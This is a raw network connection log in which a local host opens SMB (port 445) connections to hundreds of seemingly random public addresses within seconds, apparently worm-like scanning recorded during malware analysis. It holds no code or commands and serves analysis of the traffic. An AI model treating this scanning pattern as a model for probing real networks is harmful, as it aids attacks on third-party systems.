May 8, 2023 05:36:22.543608904 CEST	50375	445	192.168.2.6	48.191.218.160
May 8, 2023 05:36:22.809006929 CEST	50376	445	192.168.2.6	17.219.199.193
May 8, 2023 05:36:22.949891090 CEST	50377	445	192.168.2.6	107.165.99.9
May 8, 2023 05:36:22.996762037 CEST	50378	445	192.168.2.6	18.70.45.17
May 8, 2023 05:36:23.027879000 CEST	50379	445	192.168.2.6	185.142.20.120
May 8, 2023 05:36:23.027954102 CEST	50380	445	192.168.2.6	205.137.46.240
May 8, 2023 05:36:23.137218952 CEST	50381	445	192.168.2.6	81.97.124.52
May 8, 2023 05:36:23.137407064 CEST	50382	445	192.168.2.6	189.135.30.173
May 8, 2023 05:36:23.137587070 CEST	50383	445	192.168.2.6	17.23.134.192
May 8, 2023 05:36:23.137984037 CEST	50384	445	192.168.2.6	183.111.196.243
May 8, 2023 05:36:23.248455048 CEST	50385	445	192.168.2.6	72.89.91.91
May 8, 2023 05:36:23.340434074 CEST	50386	445	192.168.2.6	116.149.128.192
May 8, 2023 05:36:23.340591908 CEST	50387	445	192.168.2.6	169.6.177.42
May 8, 2023 05:36:23.340725899 CEST	50388	445	192.168.2.6	129.13.208.175
May 8, 2023 05:36:23.377770901 CEST	50389	445	192.168.2.6	5.87.6.242
May 8, 2023 05:36:23.378174067 CEST	50390	445	192.168.2.6	181.98.247.214
May 8, 2023 05:36:23.378257036 CEST	50391	445	192.168.2.6	218.1.3.213
May 8, 2023 05:36:23.378370047 CEST	50392	445	192.168.2.6	66.18.194.227
May 8, 2023 05:36:23.378492117 CEST	50394	445	192.168.2.6	221.228.85.16
May 8, 2023 05:36:23.378501892 CEST	50393	445	192.168.2.6	48.84.214.59
May 8, 2023 05:36:23.378710032 CEST	50395	445	192.168.2.6	167.120.107.53
May 8, 2023 05:36:23.480864048 CEST	50396	445	192.168.2.6	186.108.159.199
May 8, 2023 05:36:23.583959103 CEST	49701	80	192.168.2.6	93.184.221.240
May 8, 2023 05:36:23.584178925 CEST	49702	80	192.168.2.6	209.197.3.8
May 8, 2023 05:36:23.584212065 CEST	49703	80	192.168.2.6	95.140.230.192
May 8, 2023 05:36:23.598285913 CEST	80	49703	95.140.230.192	192.168.2.6
May 8, 2023 05:36:23.598419905 CEST	49703	80	192.168.2.6	95.140.230.192
May 8, 2023 05:36:23.598620892 CEST	80	49701	93.184.221.240	192.168.2.6
May 8, 2023 05:36:23.598762989 CEST	49701	80	192.168.2.6	93.184.221.240
May 8, 2023 05:36:23.598865032 CEST	80	49702	209.197.3.8	192.168.2.6
May 8, 2023 05:36:23.598929882 CEST	49702	80	192.168.2.6	209.197.3.8
May 8, 2023 05:36:23.653455019 CEST	50397	445	192.168.2.6	53.32.25.23
May 8, 2023 05:36:23.900058031 CEST	80	49695	192.229.221.95	192.168.2.6
May 8, 2023 05:36:23.902884007 CEST	49695	80	192.168.2.6	192.229.221.95
May 8, 2023 05:36:23.934545994 CEST	50398	445	192.168.2.6	49.214.225.153
May 8, 2023 05:36:24.018132925 CEST	50399	445	192.168.2.6	107.165.99.10
May 8, 2023 05:36:24.121656895 CEST	50400	445	192.168.2.6	97.12.215.169
May 8, 2023 05:36:24.137631893 CEST	50401	445	192.168.2.6	28.87.117.118
May 8, 2023 05:36:24.137638092 CEST	50402	445	192.168.2.6	126.51.181.179
May 8, 2023 05:36:24.246809006 CEST	50403	445	192.168.2.6	2.173.157.226
May 8, 2023 05:36:24.246917009 CEST	50404	445	192.168.2.6	163.198.219.153
May 8, 2023 05:36:24.247101068 CEST	50405	445	192.168.2.6	24.187.156.192
May 8, 2023 05:36:24.247500896 CEST	50406	445	192.168.2.6	22.87.85.126
May 8, 2023 05:36:24.357139111 CEST	50407	445	192.168.2.6	16.57.247.29
May 8, 2023 05:36:24.449920893 CEST	50409	445	192.168.2.6	84.176.222.96
May 8, 2023 05:36:24.450032949 CEST	50408	445	192.168.2.6	159.132.206.137
May 8, 2023 05:36:24.450059891 CEST	50410	445	192.168.2.6	13.206.50.103
May 8, 2023 05:36:24.512717009 CEST	50411	445	192.168.2.6	186.56.47.200
May 8, 2023 05:36:24.513331890 CEST	50412	445	192.168.2.6	181.106.151.245
May 8, 2023 05:36:24.513897896 CEST	50413	445	192.168.2.6	211.222.221.215
May 8, 2023 05:36:24.514385939 CEST	50414	445	192.168.2.6	135.83.250.9
May 8, 2023 05:36:24.514861107 CEST	50415	445	192.168.2.6	19.159.238.6
May 8, 2023 05:36:24.515525103 CEST	50416	445	192.168.2.6	138.192.119.192
May 8, 2023 05:36:24.516493082 CEST	50417	445	192.168.2.6	20.146.20.110
May 8, 2023 05:36:24.590869904 CEST	50418	445	192.168.2.6	65.101.175.179
May 8, 2023 05:36:24.634254932 CEST	80	49700	93.184.221.240	192.168.2.6
May 8, 2023 05:36:24.634591103 CEST	49700	80	192.168.2.6	93.184.221.240
May 8, 2023 05:36:24.762336016 CEST	50419	445	192.168.2.6	121.205.131.151
May 8, 2023 05:36:25.059647083 CEST	50420	445	192.168.2.6	22.50.246.198
May 8, 2023 05:36:25.075442076 CEST	50421	445	192.168.2.6	107.165.99.11
May 8, 2023 05:36:25.231174946 CEST	50422	445	192.168.2.6	11.243.14.107
May 8, 2023 05:36:25.263282061 CEST	50423	445	192.168.2.6	125.146.34.51
May 8, 2023 05:36:25.263598919 CEST	50424	445	192.168.2.6	146.66.252.126
May 8, 2023 05:36:25.265439034 CEST	50425	445	192.168.2.6	215.217.160.71
May 8, 2023 05:36:25.372555017 CEST	50426	445	192.168.2.6	147.83.6.230
May 8, 2023 05:36:25.372664928 CEST	50427	445	192.168.2.6	202.50.213.160
May 8, 2023 05:36:25.373119116 CEST	50428	445	192.168.2.6	136.14.61.102
May 8, 2023 05:36:25.373455048 CEST	50429	445	192.168.2.6	89.40.60.50
May 8, 2023 05:36:25.481060028 CEST	50430	445	192.168.2.6	41.47.135.213
May 8, 2023 05:36:25.559276104 CEST	50432	445	192.168.2.6	43.44.144.88
May 8, 2023 05:36:25.559461117 CEST	50431	445	192.168.2.6	174.243.80.83
May 8, 2023 05:36:25.559463978 CEST	50433	445	192.168.2.6	113.202.121.71
May 8, 2023 05:36:25.566183090 CEST	445	50430	41.47.135.213	192.168.2.6
May 8, 2023 05:36:25.622080088 CEST	50434	445	192.168.2.6	52.17.208.66
May 8, 2023 05:36:25.622606039 CEST	50435	445	192.168.2.6	151.54.53.9
May 8, 2023 05:36:25.623161077 CEST	50436	445	192.168.2.6	136.140.2.195
May 8, 2023 05:36:25.624747992 CEST	50437	445	192.168.2.6	44.187.26.39
May 8, 2023 05:36:25.633599043 CEST	50439	445	192.168.2.6	90.69.207.146
May 8, 2023 05:36:25.633598089 CEST	50438	445	192.168.2.6	22.225.83.70
May 8, 2023 05:36:25.633657932 CEST	50440	445	192.168.2.6	111.122.146.118
May 8, 2023 05:36:25.715488911 CEST	50441	445	192.168.2.6	58.189.63.235
May 8, 2023 05:36:25.871726036 CEST	50442	445	192.168.2.6	144.107.253.230
May 8, 2023 05:36:25.916076899 CEST	80	49695	192.229.221.95	192.168.2.6
May 8, 2023 05:36:26.074640989 CEST	50430	445	192.168.2.6	41.47.135.213
May 8, 2023 05:36:26.137677908 CEST	50443	445	192.168.2.6	107.165.99.12
May 8, 2023 05:36:26.184504032 CEST	50444	445	192.168.2.6	181.141.92.67
May 8, 2023 05:36:26.340575933 CEST	50445	445	192.168.2.6	54.205.179.148
May 8, 2023 05:36:26.405038118 CEST	50446	445	192.168.2.6	198.180.41.137
May 8, 2023 05:36:26.405226946 CEST	50447	445	192.168.2.6	52.139.88.40
May 8, 2023 05:36:26.405405998 CEST	50448	445	192.168.2.6	25.225.142.162
May 8, 2023 05:36:26.485486031 CEST	50449	445	192.168.2.6	130.156.30.132
May 8, 2023 05:36:26.489526987 CEST	50450	445	192.168.2.6	53.45.214.198
May 8, 2023 05:36:26.489710093 CEST	50451	445	192.168.2.6	8.47.254.33
May 8, 2023 05:36:26.491178989 CEST	50452	445	192.168.2.6	37.218.120.158
May 8, 2023 05:36:26.590667009 CEST	50453	445	192.168.2.6	36.29.3.48
May 8, 2023 05:36:26.686943054 CEST	50455	445	192.168.2.6	29.162.137.193
May 8, 2023 05:36:26.686948061 CEST	50456	445	192.168.2.6	61.219.32.234
May 8, 2023 05:36:26.686948061 CEST	50454	445	192.168.2.6	63.213.173.82
May 8, 2023 05:36:26.764964104 CEST	50457	445	192.168.2.6	76.114.151.188
May 8, 2023 05:36:26.765124083 CEST	50458	445	192.168.2.6	36.28.54.229
May 8, 2023 05:36:26.765352964 CEST	50459	445	192.168.2.6	173.217.183.212
May 8, 2023 05:36:26.765352964 CEST	50460	445	192.168.2.6	81.251.81.146
May 8, 2023 05:36:26.765515089 CEST	50462	445	192.168.2.6	10.177.181.206
May 8, 2023 05:36:26.765568972 CEST	50461	445	192.168.2.6	204.104.220.171
May 8, 2023 05:36:26.765753984 CEST	50463	445	192.168.2.6	118.16.76.14
May 8, 2023 05:36:26.825270891 CEST	50464	445	192.168.2.6	59.79.87.156
May 8, 2023 05:36:26.981271029 CEST	50465	445	192.168.2.6	18.81.179.201
May 8, 2023 05:36:27.200073004 CEST	50466	445	192.168.2.6	107.165.99.13
May 8, 2023 05:36:27.278963089 CEST	50467	445	192.168.2.6	103.149.169.185
May 8, 2023 05:36:27.309422970 CEST	50468	445	192.168.2.6	10.231.106.206
May 8, 2023 05:36:27.466840029 CEST	50469	445	192.168.2.6	128.161.22.131
May 8, 2023 05:36:27.528336048 CEST	50471	445	192.168.2.6	208.188.160.186
May 8, 2023 05:36:27.528336048 CEST	50470	445	192.168.2.6	18.81.215.109
May 8, 2023 05:36:27.528410912 CEST	50472	445	192.168.2.6	112.48.58.143
May 8, 2023 05:36:27.591062069 CEST	50474	445	192.168.2.6	93.151.194.93
May 8, 2023 05:36:27.591069937 CEST	50473	445	192.168.2.6	124.114.164.215
May 8, 2023 05:36:27.591187954 CEST	50475	445	192.168.2.6	9.93.35.63
May 8, 2023 05:36:27.591283083 CEST	50476	445	192.168.2.6	70.189.98.31
May 8, 2023 05:36:27.700119972 CEST	50477	445	192.168.2.6	205.236.238.114
May 8, 2023 05:36:27.794137955 CEST	50478	445	192.168.2.6	221.222.241.148
May 8, 2023 05:36:27.794315100 CEST	50479	445	192.168.2.6	94.72.156.226
May 8, 2023 05:36:27.794795036 CEST	50480	445	192.168.2.6	203.136.83.149
May 8, 2023 05:36:27.874440908 CEST	50481	445	192.168.2.6	150.22.248.39
May 8, 2023 05:36:27.874440908 CEST	50482	445	192.168.2.6	207.147.186.32
May 8, 2023 05:36:27.877027988 CEST	50483	445	192.168.2.6	81.102.124.195
May 8, 2023 05:36:27.877963066 CEST	50484	445	192.168.2.6	65.110.120.203
May 8, 2023 05:36:27.878014088 CEST	50485	445	192.168.2.6	77.236.240.176
May 8, 2023 05:36:27.878067970 CEST	50487	445	192.168.2.6	199.84.231.235
May 8, 2023 05:36:27.878088951 CEST	50486	445	192.168.2.6	31.46.122.155
May 8, 2023 05:36:27.950061083 CEST	50488	445	192.168.2.6	169.237.131.123
May 8, 2023 05:36:28.107856035 CEST	50489	445	192.168.2.6	188.200.129.184
May 8, 2023 05:36:28.262636900 CEST	50490	445	192.168.2.6	107.165.99.14
May 8, 2023 05:36:28.403312922 CEST	50491	445	192.168.2.6	125.60.119.69
May 8, 2023 05:36:28.419434071 CEST	50492	445	192.168.2.6	71.136.203.142
May 8, 2023 05:36:28.636137009 CEST	50493	445	192.168.2.6	102.31.74.1
May 8, 2023 05:36:28.697771072 CEST	50494	445	192.168.2.6	175.49.142.253
May 8, 2023 05:36:28.698007107 CEST	50495	445	192.168.2.6	88.49.253.38
May 8, 2023 05:36:28.698044062 CEST	50496	445	192.168.2.6	57.109.126.133
May 8, 2023 05:36:28.896238089 CEST	50497	445	192.168.2.6	9.86.35.66
May 8, 2023 05:36:28.896579027 CEST	50498	445	192.168.2.6	178.65.73.196
May 8, 2023 05:36:28.896656990 CEST	50499	445	192.168.2.6	23.193.201.87
May 8, 2023 05:36:28.896719933 CEST	50500	445	192.168.2.6	120.174.145.194
May 8, 2023 05:36:29.007381916 CEST	50501	445	192.168.2.6	76.253.188.220
May 8, 2023 05:36:29.007599115 CEST	50502	445	192.168.2.6	56.211.164.178
May 8, 2023 05:36:29.007904053 CEST	50503	445	192.168.2.6	121.182.135.194
May 8, 2023 05:36:29.008019924 CEST	50504	445	192.168.2.6	108.200.151.66
May 8, 2023 05:36:29.068301916 CEST	50505	445	192.168.2.6	123.174.42.52
May 8, 2023 05:36:29.073008060 CEST	50506	445	192.168.2.6	25.204.221.110
May 8, 2023 05:36:29.073817015 CEST	50507	445	192.168.2.6	66.205.124.253
May 8, 2023 05:36:29.074623108 CEST	50508	445	192.168.2.6	38.48.88.144
May 8, 2023 05:36:29.075546980 CEST	50509	445	192.168.2.6	179.199.170.216
May 8, 2023 05:36:29.076277018 CEST	50510	445	192.168.2.6	216.161.115.4
May 8, 2023 05:36:29.076991081 CEST	50511	445	192.168.2.6	215.6.192.98
May 8, 2023 05:36:29.077817917 CEST	50512	445	192.168.2.6	115.87.70.187
May 8, 2023 05:36:29.235179901 CEST	50513	445	192.168.2.6	82.49.218.217
May 8, 2023 05:36:29.304613113 CEST	50514	445	192.168.2.6	38.13.192.242
May 8, 2023 05:36:29.356652975 CEST	50515	445	192.168.2.6	107.165.99.15
May 8, 2023 05:36:29.528482914 CEST	50516	445	192.168.2.6	50.131.77.218
May 8, 2023 05:36:29.544111013 CEST	50517	445	192.168.2.6	76.169.59.154
May 8, 2023 05:36:30.175036907 CEST	50518	445	192.168.2.6	26.217.25.157
May 8, 2023 05:36:30.327667952 CEST	50519	445	192.168.2.6	122.104.125.54
May 8, 2023 05:36:30.328475952 CEST	50520	445	192.168.2.6	1.198.22.127
May 8, 2023 05:36:30.329314947 CEST	50521	445	192.168.2.6	34.240.52.60
May 8, 2023 05:36:30.330214024 CEST	50522	445	192.168.2.6	112.238.57.58
May 8, 2023 05:36:30.330621004 CEST	50523	445	192.168.2.6	137.18.195.70
May 8, 2023 05:36:30.331509113 CEST	50524	445	192.168.2.6	221.31.79.91
May 8, 2023 05:36:30.332348108 CEST	50525	445	192.168.2.6	56.204.231.83
May 8, 2023 05:36:30.333329916 CEST	50526	445	192.168.2.6	201.249.30.138
May 8, 2023 05:36:30.333699942 CEST	50527	445	192.168.2.6	67.179.247.31
May 8, 2023 05:36:30.334005117 CEST	50528	445	192.168.2.6	88.67.240.145
May 8, 2023 05:36:30.334192991 CEST	50529	445	192.168.2.6	157.229.230.125
May 8, 2023 05:36:30.334407091 CEST	50530	445	192.168.2.6	116.199.131.32
May 8, 2023 05:36:30.334737062 CEST	50531	445	192.168.2.6	180.9.198.234
May 8, 2023 05:36:30.335025072 CEST	50532	445	192.168.2.6	138.234.227.169
May 8, 2023 05:36:30.335288048 CEST	50533	445	192.168.2.6	91.65.107.142
May 8, 2023 05:36:30.335494041 CEST	50534	445	192.168.2.6	149.242.124.15
May 8, 2023 05:36:30.335639954 CEST	50535	445	192.168.2.6	60.30.101.122
May 8, 2023 05:36:30.335834026 CEST	50536	445	192.168.2.6	21.176.21.221
May 8, 2023 05:36:30.336069107 CEST	50537	445	192.168.2.6	39.227.248.28
May 8, 2023 05:36:30.357100964 CEST	50538	445	192.168.2.6	13.157.248.38
May 8, 2023 05:36:30.451606989 CEST	50539	445	192.168.2.6	107.165.99.16
May 8, 2023 05:36:30.452090979 CEST	50540	445	192.168.2.6	194.225.208.37
May 8, 2023 05:36:30.684875965 CEST	50541	445	192.168.2.6	95.69.77.140
May 8, 2023 05:36:30.685144901 CEST	50542	445	192.168.2.6	82.0.171.194
May 8, 2023 05:36:31.668514967 CEST	50543	445	192.168.2.6	34.170.145.237
May 8, 2023 05:36:31.744298935 CEST	50544	445	192.168.2.6	107.165.99.17
May 8, 2023 05:36:31.768821001 CEST	50545	445	192.168.2.6	81.152.53.116
May 8, 2023 05:36:31.769011974 CEST	50546	445	192.168.2.6	163.224.152.104
May 8, 2023 05:36:31.769411087 CEST	50547	445	192.168.2.6	123.56.214.28
May 8, 2023 05:36:31.769932032 CEST	50548	445	192.168.2.6	206.28.19.27
May 8, 2023 05:36:31.770663977 CEST	50549	445	192.168.2.6	75.163.92.5
May 8, 2023 05:36:31.771352053 CEST	50550	445	192.168.2.6	114.6.95.157
May 8, 2023 05:36:31.771588087 CEST	50551	445	192.168.2.6	42.31.66.165
May 8, 2023 05:36:31.778625011 CEST	50552	445	192.168.2.6	85.139.219.83
May 8, 2023 05:36:31.778969049 CEST	50553	445	192.168.2.6	210.168.217.46
May 8, 2023 05:36:31.779078960 CEST	50554	445	192.168.2.6	191.245.14.11
May 8, 2023 05:36:31.779313087 CEST	50555	445	192.168.2.6	198.144.64.42
May 8, 2023 05:36:31.779484034 CEST	50556	445	192.168.2.6	203.233.124.73
May 8, 2023 05:36:31.779671907 CEST	50557	445	192.168.2.6	28.40.9.89
May 8, 2023 05:36:31.779810905 CEST	50558	445	192.168.2.6	17.130.129.7
May 8, 2023 05:36:31.779975891 CEST	50559	445	192.168.2.6	103.163.148.117
May 8, 2023 05:36:31.780184984 CEST	50560	445	192.168.2.6	83.10.63.216
May 8, 2023 05:36:31.780426025 CEST	50561	445	192.168.2.6	193.147.26.249
May 8, 2023 05:36:31.780553102 CEST	50562	445	192.168.2.6	153.46.219.219
May 8, 2023 05:36:31.780734062 CEST	50563	445	192.168.2.6	77.9.154.161
May 8, 2023 05:36:31.780982018 CEST	50564	445	192.168.2.6	52.122.151.87
May 8, 2023 05:36:31.788515091 CEST	50565	445	192.168.2.6	201.65.50.209
May 8, 2023 05:36:31.789335012 CEST	50566	445	192.168.2.6	111.25.55.16
May 8, 2023 05:36:31.842487097 CEST	50567	445	192.168.2.6	192.229.235.141
May 8, 2023 05:36:31.842726946 CEST	50568	445	192.168.2.6	21.240.74.59
May 8, 2023 05:36:31.931699991 CEST	445	50549	75.163.92.5	192.168.2.6
May 8, 2023 05:36:32.434638977 CEST	50549	445	192.168.2.6	75.163.92.5
May 8, 2023 05:36:32.595731020 CEST	445	50549	75.163.92.5	192.168.2.6
May 8, 2023 05:36:32.780368090 CEST	50569	445	192.168.2.6	122.141.70.224
May 8, 2023 05:36:32.795339108 CEST	50570	445	192.168.2.6	107.165.99.18
May 8, 2023 05:36:32.888401985 CEST	50571	445	192.168.2.6	188.173.229.170
May 8, 2023 05:36:32.888673067 CEST	50572	445	192.168.2.6	3.115.47.17
May 8, 2023 05:36:32.888901949 CEST	50573	445	192.168.2.6	194.199.242.5
May 8, 2023 05:36:32.889183998 CEST	50574	445	192.168.2.6	31.193.61.164
May 8, 2023 05:36:32.889523983 CEST	50575	445	192.168.2.6	222.195.246.139
May 8, 2023 05:36:32.889769077 CEST	50576	445	192.168.2.6	174.139.148.111
May 8, 2023 05:36:32.890053988 CEST	50577	445	192.168.2.6	106.60.55.190
May 8, 2023 05:36:32.890335083 CEST	50578	445	192.168.2.6	148.29.226.251
May 8, 2023 05:36:32.890623093 CEST	50579	445	192.168.2.6	106.252.45.231
May 8, 2023 05:36:32.890916109 CEST	50580	445	192.168.2.6	142.250.132.168
May 8, 2023 05:36:32.891211987 CEST	50581	445	192.168.2.6	145.206.69.21
May 8, 2023 05:36:32.891453028 CEST	50582	445	192.168.2.6	120.251.60.246
May 8, 2023 05:36:32.891707897 CEST	50583	445	192.168.2.6	82.96.161.20
May 8, 2023 05:36:32.892685890 CEST	50584	445	192.168.2.6	6.69.20.128
May 8, 2023 05:36:32.893697977 CEST	50585	445	192.168.2.6	9.117.99.232
May 8, 2023 05:36:32.894162893 CEST	50586	445	192.168.2.6	76.100.247.9
May 8, 2023 05:36:32.895061970 CEST	50587	445	192.168.2.6	171.7.98.187
May 8, 2023 05:36:32.896066904 CEST	50588	445	192.168.2.6	48.66.213.57
May 8, 2023 05:36:32.896936893 CEST	50589	445	192.168.2.6	16.71.7.221
May 8, 2023 05:36:32.897917986 CEST	50590	445	192.168.2.6	73.86.104.16
May 8, 2023 05:36:32.898277998 CEST	50591	445	192.168.2.6	149.220.236.29
May 8, 2023 05:36:32.899213076 CEST	50592	445	192.168.2.6	76.0.215.28
May 8, 2023 05:36:32.950439930 CEST	50593	445	192.168.2.6	27.184.169.133
May 8, 2023 05:36:32.950891018 CEST	50594	445	192.168.2.6	15.39.124.111
May 8, 2023 05:36:33.674133062 CEST	50595	445	192.168.2.6	175.171.187.239
May 8, 2023 05:36:33.872412920 CEST	50596	445	192.168.2.6	107.165.99.19
May 8, 2023 05:36:33.903914928 CEST	50597	445	192.168.2.6	61.221.22.149
May 8, 2023 05:36:33.998157024 CEST	50598	445	192.168.2.6	159.189.134.12
May 8, 2023 05:36:33.998584032 CEST	50599	445	192.168.2.6	145.181.88.197
May 8, 2023 05:36:33.998861074 CEST	50600	445	192.168.2.6	108.146.157.58
May 8, 2023 05:36:33.999360085 CEST	50601	445	192.168.2.6	55.147.100.23
May 8, 2023 05:36:33.999526978 CEST	50602	445	192.168.2.6	208.61.108.246
May 8, 2023 05:36:33.999742031 CEST	50603	445	192.168.2.6	150.120.166.31
May 8, 2023 05:36:33.999883890 CEST	50604	445	192.168.2.6	138.153.132.233
May 8, 2023 05:36:34.000252962 CEST	50605	445	192.168.2.6	96.76.245.152
May 8, 2023 05:36:34.000252962 CEST	50606	445	192.168.2.6	133.233.172.43
May 8, 2023 05:36:34.000454903 CEST	50607	445	192.168.2.6	25.30.152.119
May 8, 2023 05:36:34.000579119 CEST	50608	445	192.168.2.6	72.129.75.128
May 8, 2023 05:36:34.000679970 CEST	50609	445	192.168.2.6	7.146.44.182
May 8, 2023 05:36:34.000787973 CEST	50610	445	192.168.2.6	102.26.91.108
May 8, 2023 05:36:34.000989914 CEST	50611	445	192.168.2.6	165.146.175.74
May 8, 2023 05:36:34.001266956 CEST	50612	445	192.168.2.6	132.84.85.93
May 8, 2023 05:36:34.015218019 CEST	50614	445	192.168.2.6	92.194.239.92
May 8, 2023 05:36:34.015259027 CEST	50613	445	192.168.2.6	118.134.196.53
May 8, 2023 05:36:34.015438080 CEST	50615	445	192.168.2.6	199.58.74.77
May 8, 2023 05:36:34.015453100 CEST	50616	445	192.168.2.6	155.23.208.149
May 8, 2023 05:36:34.015551090 CEST	50617	445	192.168.2.6	104.19.14.0
May 8, 2023 05:36:34.015562057 CEST	50618	445	192.168.2.6	138.224.25.212
May 8, 2023 05:36:34.015619993 CEST	50619	445	192.168.2.6	167.151.161.209
May 8, 2023 05:36:34.060352087 CEST	50620	445	192.168.2.6	190.177.20.162
May 8, 2023 05:36:34.060750008 CEST	50621	445	192.168.2.6	14.207.59.109
May 8, 2023 05:36:34.424469948 CEST	445	50610	102.26.91.108	192.168.2.6
May 8, 2023 05:36:34.778872013 CEST	50622	445	192.168.2.6	85.33.92.197
May 8, 2023 05:36:34.934829950 CEST	50610	445	192.168.2.6	102.26.91.108
May 8, 2023 05:36:34.935220003 CEST	50623	445	192.168.2.6	107.165.99.20
May 8, 2023 05:36:35.028889894 CEST	50624	445	192.168.2.6	190.47.118.153
May 8, 2023 05:36:35.064456940 CEST	445	50610	102.26.91.108	192.168.2.6
May 8, 2023 05:36:35.106996059 CEST	50625	445	192.168.2.6	151.91.19.11
May 8, 2023 05:36:35.107090950 CEST	50626	445	192.168.2.6	186.15.73.67
May 8, 2023 05:36:35.107245922 CEST	50627	445	192.168.2.6	105.216.115.91
May 8, 2023 05:36:35.107434034 CEST	50628	445	192.168.2.6	187.197.207.31
May 8, 2023 05:36:35.107476950 CEST	50629	445	192.168.2.6	109.99.118.25
May 8, 2023 05:36:35.107697964 CEST	50631	445	192.168.2.6	43.64.230.236
May 8, 2023 05:36:35.107785940 CEST	50630	445	192.168.2.6	24.249.69.22
May 8, 2023 05:36:35.107948065 CEST	50632	445	192.168.2.6	169.235.136.167
May 8, 2023 05:36:35.108063936 CEST	50634	445	192.168.2.6	180.54.83.61
May 8, 2023 05:36:35.108108044 CEST	50633	445	192.168.2.6	222.84.6.171
May 8, 2023 05:36:35.108222008 CEST	50635	445	192.168.2.6	208.131.119.57
May 8, 2023 05:36:35.108351946 CEST	50637	445	192.168.2.6	144.16.165.242
May 8, 2023 05:36:35.108525038 CEST	50636	445	192.168.2.6	19.6.121.9
May 8, 2023 05:36:35.108525038 CEST	50638	445	192.168.2.6	22.214.104.205
May 8, 2023 05:36:35.108577013 CEST	50639	445	192.168.2.6	166.217.190.76
May 8, 2023 05:36:35.123720884 CEST	50640	445	192.168.2.6	144.201.144.231
May 8, 2023 05:36:35.124653101 CEST	50641	445	192.168.2.6	103.111.175.99
May 8, 2023 05:36:35.125508070 CEST	50642	445	192.168.2.6	214.187.197.75
May 8, 2023 05:36:35.126441002 CEST	50643	445	192.168.2.6	3.202.217.170
May 8, 2023 05:36:35.127414942 CEST	50644	445	192.168.2.6	59.56.60.49
May 8, 2023 05:36:35.128676891 CEST	50645	445	192.168.2.6	99.250.89.124
May 8, 2023 05:36:35.129949093 CEST	50646	445	192.168.2.6	120.169.133.145
May 8, 2023 05:36:35.185153008 CEST	50647	445	192.168.2.6	104.11.66.203
May 8, 2023 05:36:35.185190916 CEST	50648	445	192.168.2.6	222.168.71.212
May 8, 2023 05:36:35.685893059 CEST	50649	445	192.168.2.6	29.158.115.142
May 8, 2023 05:36:35.904210091 CEST	50650	445	192.168.2.6	44.45.202.130
May 8, 2023 05:36:36.013641119 CEST	50651	445	192.168.2.6	107.165.99.21
May 8, 2023 05:36:36.153888941 CEST	50652	445	192.168.2.6	144.56.239.249
May 8, 2023 05:36:36.232291937 CEST	50653	445	192.168.2.6	198.45.82.63
May 8, 2023 05:36:36.232435942 CEST	50654	445	192.168.2.6	65.248.108.76
May 8, 2023 05:36:36.232609987 CEST	50655	445	192.168.2.6	126.57.179.5
May 8, 2023 05:36:36.232784033 CEST	50656	445	192.168.2.6	32.115.209.207
May 8, 2023 05:36:36.232964039 CEST	50657	445	192.168.2.6	94.93.159.163
May 8, 2023 05:36:36.233098984 CEST	50658	445	192.168.2.6	92.200.43.129
May 8, 2023 05:36:36.233248949 CEST	50659	445	192.168.2.6	100.90.164.84
May 8, 2023 05:36:36.233361006 CEST	50660	445	192.168.2.6	198.42.147.103
May 8, 2023 05:36:36.233514071 CEST	50661	445	192.168.2.6	59.227.134.119
May 8, 2023 05:36:36.233608961 CEST	50662	445	192.168.2.6	145.86.9.84
May 8, 2023 05:36:36.233706951 CEST	50663	445	192.168.2.6	99.98.116.173
May 8, 2023 05:36:36.233880043 CEST	50664	445	192.168.2.6	171.143.237.98
May 8, 2023 05:36:36.234081030 CEST	50665	445	192.168.2.6	160.216.225.175
May 8, 2023 05:36:36.234211922 CEST	50666	445	192.168.2.6	94.30.207.56
May 8, 2023 05:36:36.234412909 CEST	50667	445	192.168.2.6	201.189.254.179
May 8, 2023 05:36:36.265326023 CEST	50668	445	192.168.2.6	7.224.63.234
May 8, 2023 05:36:36.265460014 CEST	50669	445	192.168.2.6	31.91.80.47
May 8, 2023 05:36:36.265463114 CEST	50670	445	192.168.2.6	124.71.97.86
May 8, 2023 05:36:36.265508890 CEST	50671	445	192.168.2.6	97.142.13.49
May 8, 2023 05:36:36.265616894 CEST	50672	445	192.168.2.6	175.59.105.157
May 8, 2023 05:36:36.265629053 CEST	50673	445	192.168.2.6	48.111.224.194
May 8, 2023 05:36:36.265664101 CEST	50674	445	192.168.2.6	34.120.174.225
May 8, 2023 05:36:36.294960976 CEST	50675	445	192.168.2.6	119.86.212.120
May 8, 2023 05:36:36.295103073 CEST	50676	445	192.168.2.6	45.228.118.9
May 8, 2023 05:36:36.810221910 CEST	50677	445	192.168.2.6	199.80.153.138
May 8, 2023 05:36:37.020905018 CEST	50678	445	192.168.2.6	50.120.191.155
May 8, 2023 05:36:37.091882944 CEST	50679	445	192.168.2.6	107.165.99.22
May 8, 2023 05:36:37.279155970 CEST	50680	445	192.168.2.6	154.73.103.187
May 8, 2023 05:36:37.341825962 CEST	50681	445	192.168.2.6	75.14.64.180
May 8, 2023 05:36:37.341835022 CEST	50682	445	192.168.2.6	147.196.58.26
May 8, 2023 05:36:37.342037916 CEST	50683	445	192.168.2.6	184.88.21.209
May 8, 2023 05:36:37.342305899 CEST	50684	445	192.168.2.6	103.83.43.193
May 8, 2023 05:36:37.342533112 CEST	50685	445	192.168.2.6	209.112.75.217
May 8, 2023 05:36:37.342739105 CEST	50686	445	192.168.2.6	81.49.140.24
May 8, 2023 05:36:37.343012094 CEST	50687	445	192.168.2.6	2.240.109.75
May 8, 2023 05:36:37.343095064 CEST	50688	445	192.168.2.6	61.223.4.119
May 8, 2023 05:36:37.343445063 CEST	50689	445	192.168.2.6	198.14.247.171
May 8, 2023 05:36:37.343636036 CEST	50691	445	192.168.2.6	189.142.91.95
May 8, 2023 05:36:37.343691111 CEST	50690	445	192.168.2.6	7.218.252.128
May 8, 2023 05:36:37.343775034 CEST	50692	445	192.168.2.6	189.40.25.63
May 8, 2023 05:36:37.343856096 CEST	50693	445	192.168.2.6	153.203.194.113
May 8, 2023 05:36:37.344063044 CEST	50694	445	192.168.2.6	210.131.249.47
May 8, 2023 05:36:37.344275951 CEST	50695	445	192.168.2.6	37.204.106.20
May 8, 2023 05:36:37.374699116 CEST	50696	445	192.168.2.6	202.13.219.85
May 8, 2023 05:36:37.374913931 CEST	50697	445	192.168.2.6	177.182.158.135
May 8, 2023 05:36:37.374968052 CEST	50698	445	192.168.2.6	118.190.231.111
May 8, 2023 05:36:37.375082970 CEST	50700	445	192.168.2.6	19.230.119.198
May 8, 2023 05:36:37.375142097 CEST	50701	445	192.168.2.6	41.90.126.126
